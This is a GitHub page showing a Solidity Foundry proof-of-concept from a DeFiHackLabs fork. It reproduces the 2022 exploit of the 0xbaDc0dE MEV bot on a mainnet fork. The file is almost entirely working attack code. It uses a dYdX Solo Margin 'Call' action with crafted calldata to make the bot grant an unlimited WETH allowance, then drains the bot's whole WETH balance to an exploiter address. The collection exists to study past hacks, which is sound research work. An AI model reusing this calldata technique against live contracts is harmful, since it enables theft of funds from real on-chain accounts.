forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathMEVbadc0de_exp.sol
183 lines (156 loc) · 6.93 KB
/
MEVbadc0de_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
/**
* POC Build by
* - https://twitter.com/kayaba2002
* - https://twitter.com/eugenioclrc
*/
interface Structs {
struct Val {
uint256 value;
}
enum ActionType {
Deposit, // supply tokens
Withdraw, // borrow tokens
Transfer, // transfer balance between accounts
Buy, // buy an amount of some token (externally)
Sell, // sell an amount of some token (externally)
Trade, // trade tokens against another account
Liquidate, // liquidate an undercollateralized or expiring account
Vaporize, // use excess tokens to zero-out a completely negative account
Call // send arbitrary data to an address
}
enum AssetDenomination {
Wei // the amount is denominated in wei
}
enum AssetReference {
Delta // the amount is given as a delta from the current value
}
struct AssetAmount {
bool sign; // true if positive
AssetDenomination denomination;
AssetReference ref;
uint256 value;
}
struct ActionArgs {
ActionType actionType;
uint256 accountId;
AssetAmount amount;
uint256 primaryMarketId;
uint256 secondaryMarketId;
address otherAddress;
uint256 otherAccountId;
bytes data;
}
struct Info {
address owner; // The address that owns the account
uint256 number; // A nonce that allows a single address to control many accounts
}
struct Wei {
bool sign; // true if positive
uint256 value;
}
}
library Account {
struct Info {
address owner;
uint256 number;
}
}
interface DyDxPool is Structs {
function getAccountWei(Info memory account, uint256 marketId) external view returns (Wei memory);
function operate(Info[] memory, ActionArgs[] memory) external;
}
contract ContractTest is Test {
IERC20 weth = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
DyDxPool pool = DyDxPool(0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e); //this is dydx solo margin sc
address exploiter;
address MEVBOT = 0xbaDc0dEfAfCF6d4239BDF0b66da4D7Bd36fCF05A;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
exploiter = cheats.addr(31337);
// fork mainnet at block 15625424
cheats.createSelectFork("mainnet", 15625424);
}
function testExploit() public {
emit log_named_decimal_uint("MEV Bot balance before exploit:", weth.balanceOf(MEVBOT), 18);
Structs.Info[] memory _infos = new Structs.Info[](1);
_infos[0] = Structs.Info({owner: address(this), number: 1});
Structs.ActionArgs[] memory _args = new Structs.ActionArgs[](1);
_args[0] = Structs.ActionArgs(
// ActionType actionType;
Structs.ActionType.Call,
// uint256 accountId;
0,
// AssetAmount amount;
Structs.AssetAmount(
// bool sign; // true if positive
false,
// AssetDenomination denomination;
Structs.AssetDenomination.Wei,
// AssetReference ref;
Structs.AssetReference.Delta,
// uint256 value;
0
),
// uint256 primaryMarketId;
0,
// uint256 secondaryMarketId;
0,
// address otherAddress;
MEVBOT,
// uint256 otherAccountId;
0,
// bytes data;
//abi.encodeWithSignature("approve(address,uint256)", address(this), type(uint256).max)
// no idea of what of how this byte calldata works
bytes.concat(
abi.encode(
0x0000000000000000000000000000000000000000000000000000000000000003,
address(pool),
0x0000000000000000000000000000000000000000000000000000000000000000,
0x0000000000000000000000000000000000000000000000000000000000000000,
0x0000000000000000000000000000000000000000000000000000000000000000,
0x00000000000000000000000000000000000000000000000000000000000000e0,
0x000000000000000000000000000000000000000000000beff1ceef246ef7bd1f,
0x0000000000000000000000000000000000000000000000000000000000000001,
0x0000000000000000000000000000000000000000000000000000000000000020,
0x0000000000000000000000000000000000000000000000000000000000000000,
0x0000000000000000000000000000000000000000000000000000000000000000,
address(this),
address(weth)
),
abi.encode(
0x00000000000000000000000000000000000000000000000000000000000000a0,
address(this),
0x0000000000000000000000000000000000000000000000000000000000000040,
0x00000000000000000000000000000000000000000000000000000000000000a0,
0x0000000000000000000000000000000000000000000000000000000000000004,
0x4798ce5b00000000000000000000000000000000000000000000000000000000,
0x0000000000000000000000000000000000000000000000000000000000000002,
0x0000000000000000000000000000000000000000000000000000000000000004,
0x0000000000000000000000000000000000000000000000000000000000000001,
0x0000000000000000000000000000000000000000000000000000000000000001,
0x0000000000000000000000000000000000000000000000000000000000000002,
0x0000000000000000000000000000000000000000000000000000000000000002
)
)
);
pool.operate(_infos, _args);
emit log_named_decimal_uint("Contract BADCODE WETH Allowance", weth.allowance(MEVBOT, address(this)), 18);
weth.transferFrom(MEVBOT, exploiter, weth.balanceOf(MEVBOT));
emit log_named_decimal_uint("MEV Bot WETH balance After exploit:", weth.balanceOf(MEVBOT), 18);
emit log_named_decimal_uint("Exploiter WETH balance After exploit:", weth.balanceOf(exploiter), 18);
assertEq(weth.balanceOf(MEVBOT), 0);
}
/**
* For some reason it calls a 00000000 function on our contract.
* By changing values on the encode args we can proabaly change the func signature
* Meanwhile we can add a fallback and run our logic in there.
*
* ContractTest::00000000(000000000000000000000000000000000000000000000000000000044798ce5b00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000beff1ceef246ef7bd1f00000000000000000000000000000000000000000000000000000001)
*/
fallback() external {}
}